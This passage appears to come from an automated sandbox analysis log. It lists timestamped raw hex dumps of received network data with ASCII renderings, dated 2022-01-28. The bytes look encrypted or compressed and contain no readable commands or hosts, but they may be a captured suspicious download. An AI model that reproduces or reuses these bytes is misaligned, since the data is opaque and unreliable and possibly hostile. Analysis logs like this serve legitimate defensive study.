ce a5 1b 64 c9 d0 9b aa 2b 2b 11 f7 78 06 8b ff 3b 21 03 33 0b e8 1a b3 e9 bc d7 0d c7 c2 1a 9b 94 da e7 d4 98 78 9d a9 8c 37 56 ed 51 80 8e 7e 6b 7c cf 7d f7 f5 ec 1b fa be 96 c2 0f a1 86 3d 50 f3 ba
                                                                                              Data Ascii: %XYJN]lfVWTXq:yxV(N?+j9od_Pr\+3tFH'[+Sc>Y< y~'V ~Hv.73i`)Z+_ij#'CQdbpjy;d++x;!3x7VQ~k|}=P
                                                                                              2022-01-28 18:02:09 UTC196INData Raw: 65 4f eb a3 43 4e 1b d8 b6 21 20 dd 80 67 db 5d f9 f2 88 75 b5 ae 41 a8 63 ba 8c 0a 1f 44 68 0a 50 b1 d9 d8 05 14 b1 67 60 b0 10 2b e4 aa 16 8c 38 28 cc 69 09 bc e5 4a e3 d3 f3 52 94 c9 a2 f8 7e 01 b3 61 78 fd f5 89 70 71 9e 67 dc 95 cf 2b 7d 35 23 9a d4 28 5a 62 98 97 90 89 a8 f1 a0 dd 62 5f 46 8a 03 6c a6 ee 81 00 b7 91 ab e4 fe 0c a0 8c 57 27 ef 03 5f 54 37 a9 01 57 fd 21 8f 8e 6e 6f 27 31 51 45 7e 87 88 f1 2d 31 43 c2 d7 c6 aa f2 ae 48 db 78 fb 4b 47 1c 1e f2 66 19 9f 9b 9b 72 24 9b 6b 21 43 8c 90 f2 3e 59 cd 03 5d ac 01 01 b9 40 23 8d 67 52 f4 48 5e fa f7 9a 2e 14 ae c5 5a 00 79 51 d9 bd 2a 4b 6d 20 70 1e 24 ac da 8c 66 f6 29 61 09 3e 64 66 c1 cf 93 6d b4 5e 43 f2 e2 bb 7e 98 12 70 42 d7 ec 8f 2e 97 4d 3d d2 e0 61 11 86 d1 9b ba eb b2 82 7b 65 54 d2
                                                                                              Data Ascii: eOCN! g]uAcDhPg`+8(iJR~axpqg+}5#(Zbb_FlW'_T7W!no'1QE~-1CHxKGfr$k!C>Y]@#gRH^.ZyQ*Km p$f)a>dfm^C~pB.M=a{eT
                                                                                              2022-01-28 18:02:09 UTC200INData Raw: fa 55 04 e0 1b d5 2f ce 1c d0 a3 fb be ae 03 dd 4a 70 59 88 73 38 d7 9a 5f b6 0b 75 f4 40 f9 c0 68 b1 19 70 a5 31 8e 45 80 28 f8 5a 0e e4 01 33 19 20 47 3f 3f 0a c3 bc 3a b7 3c 58 58 df 9f ae b7 71 e8 32 b6 9f 32 a6 04 49 5a 3b 82 b7 98 99 bb 22 b7 7a a8 0e 25 78 b0 d1 7a b6 b8 b0 dc fa 9a bd 29 f5 e2 08 df 20 29 df b8 7b 8e 7e 4c 99 63 17 c5 f7 13 03 66 70 bd bb 19 0c 2f a4 fb f3 fa 9d e4 14 4a f2 d2 d6 0a 46 4b 1c e0 9c d9 6e 76 db d4 37 9e e6 27 ec ba c7 7a 5e d9 b4 58 0c 6a 33 80 7d bf be 58 ad 8e f3 15 42 57 8a 69 90 73 8c 3b 27 0e 92 52 bf 9c f6 2e e4 07 6a 8f 1d e2 64 39 62 7c 76 96 30 34 f8 56 de 3c 6e 9b a1 1c fa d3 3e 03 09 35 2b f7 74 d3 9e 91 8d 8f 27 a7 6b 83 f7 3c ac 68 be e5 a7 9f d0 03 5f ba 09 d1 1d c8 d0 09 81 0e 90 dc 57 65 bc 84 19 48
                                                                                              Data Ascii: U/JpYs8_u@hp1E(Z3 G??:<XXq22IZ;"z%xz) ){~Lcfp/JFKnv7'z^Xj3}XBWis;'R.jd9b|v04V<n>5+t'k<h_WeH
                                                                                              2022-01-28 18:02:09 UTC204INData Raw: be e4 5c 79 c8 44 c0 67 30 fa 13 ff 56 3f 7a 11 2c 69 e8 f1 b7 f1 91 5d ed 4a 2d 76 e0 5d cf 87 cf 79 d6 3a 2b bd 59 bc fe 40 da f6 ac f4 9d 6f c4 91 da dc 1e 52 50 cb a9 ac ec 5d 88 98 2e 4d d5 e3 ec b8 14 f5 dc d2 92 df 11 d0 3a 4a a8 9f 43 c7 19 97 d0 b4 a7 fa 50 c9 2b 8a 72 9b 88 07 bb b2 3d 9d 01 00 bc 80 87 da 0a de 05 a5 21 66 02 c1 79 83 95 03 cf 75 6f 03 10 b2 cf e8 a8 c6 78 fa 85 9f bf 53 e5 ed c3 ec 16 6c ca 22 26 49 5f b9 39 82 db 40 5f 69 14 d3 d5 d1 08 a5 3c e7 78 da 0d 9f ab a2 87 c5 09 82 88 6a 53 f2 26 92 24 5f 86 5b 01 1e f9 39 ee f5 45 28 22 87 4f 1c b3 5b ef 74 a7 69 3e f5 12 b5 8f bc 19 eb 0f 82 a9 be c9 1d bd d7 cc 77 43 7f fe 8b a8 ee 0c bb 21 eb 62 15 fa 95 22 60 c8 86 88 c2 d0 f6 95 fa 4a 30 b0 2e 58 79 bd e6 35 76 73 22 ee d8 72
                                                                                              Data Ascii: \yDg0V?z,i]J-v]y:+Y@oRP].M:JCP+r=!fyuoxSl"&I_9@_i<xjS&$_[9E("O[ti>wC!b"`J0.Xy5vs"r
                                                                                              2022-01-28 18:02:09 UTC209INData Raw: 87 45 4e 67 37 76 3d 83 7c 70 76 20 ee f6 c5 c4 27 15 d9 92 c2 02 2d 73 cb e2 3f b7 08 0b 0f 87 ca 85 bc ee 15 4f 41 b2 05 5e e7 4a c8 e9 52 12 0b b2 92 eb 45 8d 42 de 94 d6 2a d2 f1 d1 d2 18 ef cf e9 b2 22 31 16 3c 16 90 a4 36 02 98 b4 8a 00 e8 8b e0 38 4d 30 5d 28 7e bb c3 52 ce b9 cf b6 a4 90 50 7d 47 33 14 d8 e1 73 2e 42 82 14 95 82 5d 7e ec 5d d8 f8 28 07 98 9b f2 92 2b ab b8 4e a9 63 3a 15 94 33 2b 98 15 a0 c0 16 f6 72 6f 92 3c 6c 38 7b 64 7f ac 65 9a 16 96 be 2a 3a 9d 10 19 53 39 3b d9 01 c8 ed 38 b1 fd 8e 80 29 7f 18 9a b4 a3 52 7e 7f 3a cc 7d 88 f8 ba c3 4f da f5 32 ae 4a 44 d6 59 0f 1f 79 7a 55 ff 15 72 57 f5 91 cd bf cd 73 08 02 e4 fc ee a5 9e 7d 5b ce 96 3f bb 8a c7 cf 6c 06 ce cf 6c ae be 5b 70 c2 de 86 59 9f 11 56 5b e6 dd dc 98 44 e8 93 63
                                                                                              Data Ascii: ENg7v=|pv '-s?OA^JREB*"1<68M0](~RP}G3s.B]~](+Nc:3+ro<l8{de*:S9;8)R~:}O2JDYyzUrWs}[?ll[pYV[Dc
                                                                                              2022-01-28 18:02:09 UTC213INData Raw: d0 a3 51 8a 7f cc 69 b9 fe 9c 3e 68 ba d2 a2 e1 b1 56 d7 a1 3e d9 b1 87 11 47 25 3b f3 3c 0f bf 64 59 e2 bd dc bf f5 f0 66 5c ae f9 ca 55 52 53 09 1f b1 79 90 e4 7a cb 3f eb c7 e8 7c 86 03 12 69 73 e9 bf 33 44 29 ba 97 aa 16 a5 b8 2c f5 b1 f4 2f 38 b8 1d 4c 13 7a 26 80 eb 6f 2c 72 a7 6c d1 d5 d0 34 39 3e 76 82 a8 01 fc 01 e5 95 b7 15 41 1f 53 97 ee 7f a1 2b cf d5 1d 2c 8d d9 4b 77 a5 97 18 79 08 d3 c6 3e 65 9a 73 54 78 c2 a5 34 bc c5 a7 23 74 4a 44 bf fd 27 66 a1 8e 0d f1 0d bd e3 12 98 f5 48 bb 81 3a 06 dc 9e 37 59 1a 89 25 60 0e 56 9a 45 61 1b c9 56 ea d0 2f b5 c8 cd 63 9f 96 db 1a c3 6c af d7 6d 98 f2 64 0b e5 60 cc e2 84 63 ef 81 bf ca 68 5c b9 38 c1 03 cb 03 86 13 95 47 9c df 25 d9 16 4f 03 cc ae b9 bb ab 4e 4a 74 36 ea 80 83 e4 48 e7 3e b5 40 06 ca
                                                                                              Data Ascii: Qi>hV>G%;<dYf\URSyz?|is3D),/8Lz&o,rl49>vAS+,Kwy>esTx4#tJD'fH:7Y%`VEaV/clmd`ch\8G%ONJt6H>@
                                                                                              2022-01-28 18:02:09 UTC217INData Raw: da c7 34 09 ff 5a 31 3f 3a 59 92 c3 a5 6b c4 ab fc d0 d8 26 32 8e 8b 2a 3f 2b 2c 86 a4 00 60 05 35 e0 26 f7 e7 08 d6 69 7b 1c de 4c f6 0b e0 98 66 4c af 86 e8 74 7f 3a 19 cd 12 78 b4 e9 62 78 bb 02 88 b2 9e e8 f2 f2 dc ff b9 cc b4 5b 4b 25 0c 44 b2 7a 39 cf 45 60 25 ae 35 31 43 1e b9 40 4a 3f 66 ed 28 e1 a4 00 54 fc ec 25 8a 1e a3 49 ca 59 9f 0d ce cc e2 e0 93 96 82 e1 60 0d c4 9b 29 fd 04 ad 67 ac 36 19 1e 3e e3 5a 59 1d 1e d2 32 b2 cc 50 71 96 fd fa af 7f 70 fa 22 b1 16 c2 29 5d b9 c4 d0 65 1a 62 56 90 8f 54 1f 56 d4 34 4a 82 56 5c ad 39 da 93 cd d6 0b 1f ce e7 fa e0 7b dd b9 8f 26 bd 3e 23 92 ee 3d 95 04 fb c9 db a6 07 ee 2d 08 d5 99 76 f9 f3 54 db 95 82 d9 e9 50 17 51 52 fc 36 52 db 96 c3 2c e9 69 9b 77 f7 c7 42 01 30 da fa 5f cd 7f 10 b3 a2 c5 cc 48
                                                                                              Data Ascii: 4Z1?:Yk&2*?+,`5&i{LfLt:xbx[K%Dz9E`%51C@J?f(T%IY`)g6>ZY2Pqp")]ebVTV4JV\9{&>#=-vTPQR6R,iwB0_H
                                                                                              2022-01-28 18:02:09 UTC220INData Raw: 61 bb 6a 63 d8 b6 49 00 be d4 a2 25 86 7a b9 07 88 99 5a 96 fc 96 59 74 46 8f f7 95 f2 b1 34 71 d9 25 1c b7 ed 92 11 8f b0 e2 8c 33 cc 65 b5 10 12 bb 40 bd 03 37 07 af c5 17 88 ee e4 27 40 a4 2d 60 1b 3e d1 af ca 46 27 03 dc d1 0b 98 d0 0e 39 24 91 41 db 2c ee 0b 1f 1e 59 19 c6 aa ac e9 bd 9c 69 69 20 d1 b8 55 ba 5d 11 3a 29 de 0b ff 62 fe 85 e8 9d ed 33 5e 62 4d 41 48 f3 aa c1 e5 70 4d 6c 64 65 25 9e da ab de ce d1 02 10 8f 21 a2 d9 1d 51 7c cf 7c 8b b9 54 cf 5d 58 81 9c da 00 c6 ad 97 a3 2b 16 09 7e 45 f2 a3 71 bf 9f 6b 74 ea 3f a5 68 00 89 09 84 17 f0 73 7e 72 0b 12 81 ae 04 50 71 e9 7c 7b 05 16 f7 ba 4c 70 9c 05 18 41 c5 96 4a de ab 52 a8 f2 e7 c2 ec 3b 21 fe df a0 0a af 5a 3a 19 53 39 f4 e9 ce e0 a8 9b dd e4 8d 61 58 31 3a 30 c6 30 7c a9 18 13 4e 45
                                                                                              Data Ascii: ajcI%zZYtF4q%3e@7'@-`>F'9$A,Yii U]:)b3^bMAHpMlde%!Q||T]X+~Eqkt?hs~rPq|{LpAJR;!Z:S9aX1:00|NE
                                                                                              2022-01-28 18:02:09 UTC224INData Raw: c9 32 0f ed ef f2 79 ca b4 f3 99 ca b7 61 07 02 c4 e3 93 a3 ac fa 0e da 26 59 2f 80 7c 4d 78 5b 7e 54 f4 06 d6 37 ad 27 8b 89 83 9f cf 2c 0c ba 8e 7d d6 42 c3 17 ab 2a 0f b6 99 ac d6 42 b7 05 2b 8c 7a 22 76 43 49 55 04 ad 53 0b 4e e2 62 ef f7 e0 20 19 a6 bb 0b 41 3b c0 ff d5 3b c9 2a 79 d1 3d cc dd db c4 91 e4 6c b8 fd dd af 27 f7 eb 84 17 a3 c7 68 d1 49 2b f3 86 7e 2c 0a b1 69 2d 85 8f f7 ec 09 3a 4f 10 3d c3 67 50 e2 66 a7 33 98 59 09 4d 60 99 df a4 b3 63 62 94 67 51 12 42 b7 79 a1 b0 ea 73 c4 92 6b 27 89 89 fd d9 bc 8b f4 0a cd 2d fd dd a9 4a af 54 f9 ee 09 31 e0 50 e9 f9 9b dc 2a 75 ba fc 5d 0e c5 64 9b a3 bf 73 ca ab 24 79 ac ad 27 f4 0a bc 8c 76 41 38 2b fc 50 91 e3 eb 89 82 16 55 03 27 84 1b e6 12 4c d8 35 df a4 ba 87 fd ac a0 36 25 fd d0 b1 18 51
                                                                                              Data Ascii: 2ya&Y/|Mx[~T7',}B*B+z"vCIUSNb A;;*y=l'hI+~,i-:O=gPf3YM`cbgQBysk'-JT1P*u]ds$y'vA8+PU'L56%Q
                                                                                              2022-01-28 18:02:09 UTC228INData Raw: fb 95 da 63 5a ad 18 39 ee 54 b3 42 85 d4 fc 30 57 15 91 a3 fe 4d 21 a7 09 54 b3 54 b3 02 e1 b9 37 c9 60 a0 77 e2 20 48 94 78 10 64 dc 65 5f 31 d9 ed bd 61 55 42 85 d4 fc 10 05 48 94 37 e9 c6 d8 27 c0 ad 18 7c 1a 72 00 b2 a5 62 d7 c2 ce f6 54 c1 4b 73 83 de 16 66 e2 45 0d 5d 4a fe 68 86 34 04 e6 59 40 a0 77 e0 1b c0 c9 05 68 95 da 78 10 56 b8 a5 03 4a 9a 03 63 7f a2 54 b3 07 6d 07 6d 10 05 06 eb c2 ce 82 2a 25 ba 99 e5 ce ed d2 f7 f6 54 c7 5b 30 57 54 b3 07 6d 0c fa 3b f3 a8 8b af 1d cf 6f 59 40 f4 4f 55 36 0f 82 66 e2 3d f8 70 fb 85 b1 07 6d 5c c8 fd e6 58 be a0 77 e3 a3 8b c1 24 38 09 73 a3 fe 0e ff 84 2f f4 4f 52 ae ee 3f 92 53 11 87 c2 ce 83 ac e0 1b ce ed de 16 34 61 21 b0 d3 7a 7c 1a 52 ae 86 34 48 94 3c 76 2e 52 86 34 41 02 92 53 55 36 08 f0 31 d9
                                                                                              Data Ascii: cZ9TB0WM!TT7`w Hxde_1aUBH7'|rbTKsfE]Jh4Y@whxVJcTmm*%T[0WTm;oY@OU6f=pm\Xw$8s/OR?S4a!z|R4H<v.R4ASU61
                                                                                              2022-01-28 18:02:09 UTC232INData Raw: 87 b6 c0 c9 0e ff 85 b1 43 08 b3 27 db 8e 3b f3 a9 0e 8b c1 2a 47 71 7e 76 0b 14 0f f2 49 62 d7 e0 1b 81 a7 7e 1f c4 d3 16 14 63 5a a2 7c 3a 70 8f cb 0a f5 bf 46 af 1d d5 7f c7 5b 2a 47 76 0b 58 be b0 a0 04 e6 42 85 dd 93 f5 d1 12 0a 9b ea 5c c8 af 1d d2 f7 85 b1 07 6d 07 6d 51 2c 6c f1 a6 86 14 0f ed bd 35 e4 05 68 94 58 9b ea 15 91 b1 22 13 8c 2d cf 08 f0 2d cf 1c 23 c6 d8 66 e2 00 db fa 5e a2 7c 74 06 85 b1 43 08 b3 27 da 0c 83 ac f4 4f 42 85 c3 51 59 40 f4 4f 47 12 59 40 88 39 97 e0 7a 15 f5 d1 1c 23 c7 5b 03 63 5c c8 a4 81 c6 d8 63 5a b0 a0 05 68 92 53 59 40 d4 fc 6b 6e 8f cb 04 e6 4f 26 4e a4 e4 25 d4 fc 07 6d 11 87 e1 9e 78 10 7c 1a 7f a2 18 19 ef c2 ab 13 f9 db da 0c fd e6 52 ae fa 5e a9 0e 91 d0 9d ef 8f cb 63 5a ba b9 56 b8 d0 f2 27 c0 bc bf 15
                                                                                              Data Ascii: C';*Gq~vIb~cZ|:pF[*GvXB\mmQ,l5hX"--#f^|tC'OBQY@OGY@9z#[c\cZhSY@knO&N%mx|R^cZV'
                                                                                              2022-01-28 18:02:09 UTC236INData Raw: be f1 f8 72 3f dc 2e 4e 9a 8f f5 09 4d ec 04 2e 6c 4c a1 41 3c db b0 03 5d d3 44 05 56 c3 6f 0f bc db b0 91 ee 1e 16 02 df 88 07 6b 53 c7 66 28 7f 18 24 b6 92 20 13 e2 1d ce d0 ac a8 d2 ca ad 25 fc 5e f1 fa 6e cb 45 30 4c a2 6a d0 14 33 04 da b4 96 ee 03 ce d1 dd af 98 5e 92 6f 66 de 19 a0 73 b8 4b 27 2e 69 80 1f 74 3d 33 e5 6e cd dd a8 39 d5 d2 cc 64 e7 d5 44 f8 62 b2 9e 2e 69 3b c8 91 eb 88 02 d8 3c 5a f8 7f 99 fc 58 ad 23 b3 1c 23 8f 38 51 c1 71 9e 4b c6 e2 ed 87 71 44 37 d3 cd 50 0e c5 c7 61 d5 45 7d a7 69 53 61 6f 39 d4 ca d9 a2 46 94 62 d2 ce 02 d8 de 2f 17 ae 36 5f c7 62 a9 37 81 9e 23 8c 7f 9b cc d1 65 67 9e 49 f3 f4 81 9f 4c a7 ab 2b 46 b7 44 b2 c5 6e bc 87 82 12 14 37 e1 a9 fc 54 6f 4e 62 e0 ab 24 a2 4b 98 55 58 89 e4 12 4c a8 ca d4 ca d4 da 3b
                                                                                              Data Ascii: r?.NM.lLA<]DVokSf($ %^nE0Lj3^ofsK'.it=3n9dDb.i;<ZX##8QqKqD7PaE}iSao9Fb/6_b7#egIL+FDn7ToNb$KUXL;
                                                                                              2022-01-28 18:02:09 UTC241INData Raw: 23 8d 33 e6 c4 eb 53 09 ac ad c1 73 4d 19 55 0e 3c 4e 1c 1b 12 32 f1 ff 49 2f 49 2f 43 30 db b6 28 7a 94 60 a4 b9 46 b7 59 78 70 c3 0a cd 3f c5 1c 1b e4 1d 99 dd a7 31 f6 6c d8 3f e3 9b f3 f4 5c f0 4c a7 0a c2 3b c4 61 62 7d aa 32 6b f4 78 6b 59 79 a5 04 d0 3b c5 c1 7d c4 e5 8c 75 82 1f 7f 97 45 38 f3 f9 b9 02 d8 32 70 cf 99 d1 b8 80 e4 11 0d 49 76 3f a9 3a 6e c5 a3 cd 82 19 2e 61 1b 92 15 a2 42 b6 99 d6 2f e7 b1 11 88 0a f6 66 14 3d 1c 11 50 9b 21 82 94 6a 40 b2 3a 42 16 26 4c ad 70 ca 51 1c 5d 7a 64 ec 07 6d 74 04 ee 3f fd 36 66 e2 20 11 a4 bc 2b f7 a9 33 f1 fa 44 b6 74 3a ba 85 2f e8 b0 9c 3a 4c df a5 31 e5 82 16 00 e7 a3 c5 aa ab fc 58 5d 71 c0 f0 cc d0 dd a4 53 06 21 87 0e c8 76 3c e9 85 e2 17 ba 8e 60 e5 88 0e ea 02 ea 02 e2 16 e3 95 3a 46 41 34 a5
                                                                                              Data Ascii: #3SsMU<N2I/I/C0(z`FYxp?1l?\L;ab}2kxkYy;}uE82pIv?:n.aB/f=P!j@:B&LpQ]zdmt?6f +3Dt:/:L1X]qS!v<`:FA4
                                                                                              2022-01-28 18:02:09 UTC245INData Raw: f1 a9 47 42 c6 ac f0 03 63 5a c3 22 40 e5 cb 0a 87 e6 5f 3e 1e 5a b1 57 78 64 b9 70 fb e1 9e 71 1a 57 5f 31 bc cd 02 b5 59 2e 37 9b 98 17 d4 88 5c 8f cb 65 5f 50 e8 44 eb da 7e 70 bd 24 4c fe 2c 38 0e b8 b4 aa 90 0f e7 ce 8c 33 8d a3 9b 98 24 53 42 ec 7e 6b 0b 3f fd e6 2b 8b a4 ed df f8 30 25 db d8 73 ed d8 6a 82 45 7f cb 13 e2 65 2b af 5a c3 51 2c 28 23 d0 80 4c cb 00 bf 29 86 40 e9 ca a6 f2 2c 0b 78 10 05 68 a6 f5 b4 de 63 38 02 93 a1 8d 87 d3 16 7d db fa 3b b4 aa 90 4e a4 c0 ac f8 38 25 d2 83 cd 3a 1c 4f 53 77 f9 be 83 ac 95 da 0c 88 56 ca 91 95 ae e8 51 60 a6 e3 e4 25 ba b9 37 8c 2e 3b a7 65 3e 18 76 47 66 87 f1 c7 5b 45 0d 3c 19 fa 30 1e 4d 4d 40 e3 cc a4 f5 b4 ed bd 41 02 e1 df fc 0e 9e 3f 98 0e 96 1b c4 bf 33 ba d6 4c eb d2 b0 a0 77 8d c6 99 80 48
                                                                                              Data Ascii: GBcZ"@_>ZWxdpqW_1Y.7\e_PD~p$L,83$SB~k?+0%sjEe+ZQ,(#L)@,xhc8};N8%:OSwVQ`%7.;e>vGf[E<0MM@A?3LwH
                                                                                              2022-01-28 18:02:09 UTC249INData Raw: 2a 47 61 55 58 be a5 03 11 87 e2 20 2e 52 aa 90 6a ec 3a 70 fb e1 f1 c7 3d f8 37 e9 fb e1 fb e1 f2 49 7e 1f ed bd 33 de 77 8d 90 4e a5 03 63 5a 87 b6 af 1d a6 86 03 63 6c f1 f5 d1 5b 45 3f fd d0 f2 7a 15 a9 0e ce ed 93 d5 4f 26 13 8c 73 83 9d ef c2 ce 83 ac fa 5e a4 81 d4 fc 11 87 d3 7a 43 08 84 2f b7 32 29 c5 32 5c a7 09 01 5e 9d ef c3 51 23 b5 6f 79 92 53 31 d9 e4 25 df 99 91 d0 81 a7 70 fb b2 a5 23 b5 4a 9a 09 73 ea 35 90 4e c5 56 ca e3 c6 d8 77 8d 89 bc 9f f4 e1 9e 02 e1 e9 b2 ca e3 c7 5b 2b ca 8a 3e 2c 4c bf 46 21 b0 d4 fc 05 68 88 39 9d ef ad 18 6b 6e 95 da 65 5f 1d a6 86 34 61 55 53 31 b4 aa f1 c7 15 91 a4 81 c4 d3 0f 82 4e a4 ee 3f 8f cb 35 e4 24 38 4e a4 eb b7 32 5c c8 dd d6 01 06 eb f2 49 39 ee 4c 9f 80 24 54 b3 52 ae fa 5e ab 13 e9 b2 e1 9e 03
                                                                                              Data Ascii: *GaUX .Rj:p=7I~3wNcZcl[E?zO&s^zC/2)2\^Q#oyS1%p#Js5NVw[+>,LF!h9kne_4aUS1N?5$8N2\I9L$TR^
                                                                                              2022-01-28 18:02:09 UTC252INData Raw: 1f ab 13 8c 43 08 f0 44 8a c1 b4 55 31 d9 89 bc 87 b6 af 1d 0b 49 26 0c 02 4a 31 72 ff 0d 9b 0d 82 c0 23 5c 37 06 04 0b 87 5a 2f 3e 84 f6 8d 19 63 c5 c9 aa 6f ed 2e 91 2f 51 a8 30 a8 09 f2 ff 14 70 85 02 1e 56 c5 e7 52 d3 06 5b ba c2 b4 07 92 2b b2 0e 00 ad 62 7a ea 47 93 63 a5 6a 6a 2c b3 9b 21 6d 8b 27 23 55 c9 be 1a c1 d2 70 7c 9d eb b7 32 5c c8 dd 93 d5 7f a2 7c 1a 1e 28 42 85 b1 22 33 de 17 97 e0 1b a7 09 73 83 8b ef ec 14 ab 7d f3 a2 83 6e 34 a3 01 85 6b b7 cd b0 76 df 66 3b 2b 1d 59 9a bd 9b 15 4c 42 5b ba 58 5f b1 dd 4e 79 70 04 3d 23 57 c4 07 b9 d7 7b 5f 97 39 11 32 e9 63 a5 a1 5b 80 db 02 6d cc 17 e8 4f 96 a2 05 11 2c b3 56 c9 c4 2c 2b ae 00 24 43 7e be 3b 2b 1c f7 29 24 d9 68 18 c4 0e 22 55 4d 5a b8 b5 2d cf 6f 79 92 53 31 d9 89 bc bf 46 8f cb
                                                                                              Data Ascii: CDU1I&J1r#\7Z/>co./Q0pVR[+bzGcjj,!m'#Up|2\|(B"3s}n4kvf;+YLB[X_Nyp=#W{_92c[mO,V,+$C~;+)$h"UMZ-oyS1F
                                                                                              2022-01-28 18:02:09 UTC256INData Raw: 03 af e2 df 27 0c 05 97 5b 89 43 f7 6f b5 d2 08 46 43 f7 29 76 c7 a4 7e ae 57 c4 2c e2 ec c5 a9 a8 34 84 d0 57 84 ca 1c 82 93 0d 82 b4 18 d5 80 b8 06 27 3f 67 cc 50 56 21 15 23 72 92 cc 42 43 9a f5 43 be 55 a7 98 e4 b5 bd d1 17 03 f7 42 85 4e 5b ba b9 c8 22 cc e8 30 57 3b f3 cc e8 30 57 3b f3 cc e8 30 57 3b f3 cc e8 30 57 3b f3 cc e8 30 57 3b f3 cc e8 30 5e cd 6a ec 08 f0 44 8a bd 64 f9 fe 97 57 8c f4 b0 5f af e2 df 66 1d 59 bf b9 c8 22 cc 17 68 18 e6 d7 78 ef 3d 0e 09 8c bc 4f d6 fe 97 31 08 2e d5 15 fb 8b 07 38 3e 2e ad a7 cb 8e b7 f4 83 53 ce 29 09 8c bc 7e d3 85 4e 1a d2 08 0f 39 22 cc 17 2e 9e 8e b7 84 e3 5c 37 5a 0f 7d 62 66 2e ad e7 03 af e2 df 32 90 b1 dd 3a bc 40 7f 05 a4 7e e0 bf 8a c1 b4 0b b4 55 c9 fe a4 7e e0 87 7a ea ca 7a d9 76 f4 da c7 a4
                                                                                              Data Ascii: '[CoFC)v~W,4W'?gPV!#rBCCUBN["0W;0W;0W;0W;0W;0^jDdW_fY"hx=O1.8>.S)~N9".\7Z}bf.2:@~U~zzv
                                                                                              2022-01-28 18:02:09 UTC260INData Raw: ca 45 f2 ef 94 1e d7 4a e4 7f 5d 9b 59 d2 08 32 9c d5 80 92 97 2f 2b 54 7d 62 28 dc df 66 1d 38 a5 fc 9c f2 87 49 e8 ae 55 c9 9f 6a 22 cc 17 42 64 31 26 93 04 0d 82 2a d6 f6 ab 13 15 6e 09 d0 21 43 f7 60 64 6a a4 f1 b7 42 85 4e 5b ba b9 37 e9 b2 b3 27 c0 c9 03 63 5a c3 be 9c 34 e4 da 93 4a 46 70 4e 11 78 ef 72 b0 5f af b7 98 9d 10 a1 5d b5 d2 69 f7 29 3a e9 2b 35 1b 3a eb 48 6b cf ce 12 f5 13 30 a8 74 f3 10 fa a1 06 32 a3 01 a1 36 99 1a e1 52 51 d3 81 78 ef 3d 07 97 1f 54 4c 60 2d 30 a8 74 f9 24 c7 a4 7e e0 e4 da f3 33 21 4f d9 76 f4 b0 5f af e2 df 66 1d 59 bf b9 c8 6b d8 d5 80 5d 2b b1 dd 4c f6 77 72 f9 47 2e ad e7 06 ae 64 23 13 cc 17 68 45 31 26 d3 d2 a9 f1 1b 0e 7e e0 b9 e6 d4 03 c1 9a 98 9d 4d f0 bb c3 84 ce 01 a1 54 60 3e 84 15 3c 8f 34 ac 75 65 a0
                                                                                              Data Ascii: EJ]Y2/+T}b(f8IUj"Bd1&*n!C`djBN[7'cZ4JFpNxr_]i):+5:Hk0t26RQx=TL`-0t$~3!Ov_fYk]+LwrG.d#hE1&~MT`><4ue
                                                                                              2022-01-28 18:02:09 UTC264INData Raw: 03 40 80 24 38 5a c3 51 2c 0a f5 d1 75 e8 30 57 3b 8a 3e 7b 98 ec 3a 70 fb 7d 9d ef c2 79 89 a7 12 d8 31 ef f4 ae d3 32 14 e3 f9 81 fd 74 3e 43 30 71 7e 1f ab 1a 1e 28 42 84 2f d4 fc 63 5a c3 51 2c 4c 9f f4 4f 26 3d f8 59 40 80 24 38 6b 6e f6 54 b3 27 c0 c9 60 d2 f7 d6 01 5e cd 6a ec 3a 70 fb e1 9e 71 7e 1f ab 13 8c 43 08 f0 44 8a 3e 7b 98 62 d7 84 2d cf 6f 79 9b ea 35 e4 36 66 e2 20 35 e4 25 ba a6 86 34 61 4a 9a 67 64 c3 51 2c 4c 83 ac 95 da 18 19 9c 6c fb e1 9e 71 7c 1a 1e 28 42 85 b1 22 33 de 16 14 0f 82 2a 47 12 0a f5 d1 75 88 39 ee 3f fd e6 2b ca e3 a3 fe 69 69 69 69 68 e7 ad 18 1d a6 86 34 6d 74 06 eb a2 7c 1a 1e 37 e9 b2 a5 28 42 85 b1 1d a6 86 34 39 ee 3f fd 8b c1 4b 1c 53 31 d9 89 f7 d6 01 5e d0 f2 49 17 92 53 31 d9 89 bc bf 46 8f cb 65 5f 50 a9
                                                                                              Data Ascii: @$8ZQ,u0W;>{:p}y12t>C0q~(B/cZQ,LO&=Y@$8knT'`^j:pq~CD>{b-oy56f 5%4aJgdQ,Llq|(B"3*Gu9?+iiiih4mt|7(B49?KS1^IS1Fe_P
                                                                                              2022-01-28 18:02:09 UTC268INData Raw: bf 46 80 24 38 6b 6e 16 14 0f 9d ef c2 ce ed 5d 4a 9a 58 be c4 d3 7a f5 d1 75 f7 d6 01 5e cd 9a 67 64 23 b5 ad 18 19 64 dc 11 78 13 6c f6 54 4f 26 3d 07 62 2f ab 13 72 00 db 71 81 58 41 8d 39 ef c3 50 a8 8a 3f fc 62 d6 00 da 0d 7c 1b a0 76 0a f4 4e a5 02 e0 eb 47 e2 d0 02 11 77 7d 6d 84 2e 53 30 56 b9 36 67 65 5e cc e9 b3 26 3c 77 8c 42 84 2e 53 30 56 b9 36 67 65 5e cc e9 b3 c9 8e a6 68 17 96 5c 30 22 77 e4 4c f1 a9 7b ed d1 f2 b9 c7 ab e3 53 c1 bb cc 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 18 eb 47 48 71 a1 26 69 3b 07 6c a6 c1 3b 83 d8 73 fa 27 b9 4a e7 d0 71 fb 64 57 b5 a3 78 96 2f 20 dc e1 6e f7 d7 85 b0 a1 f8 58 bf 47 13 8d 3c 8d 34 be 1b 7e c0 9d bd 0c b5 c3 aa d4 8c 37 9d 96 24 41 7f df e4 a6 05 eb 3a fd 6b fa ca 70 69 f6 fd 41 f6 a4
                                                                                              Data Ascii: F$8kn]JXzu^gd#dxlTO&=b/rqXA9P?b|vNGw}m.S0V6ge^&<wB.S0V6ge^h\0"wL{SGHq&i;l;s'JqdWx/ nXG<4~7$A:kpiA
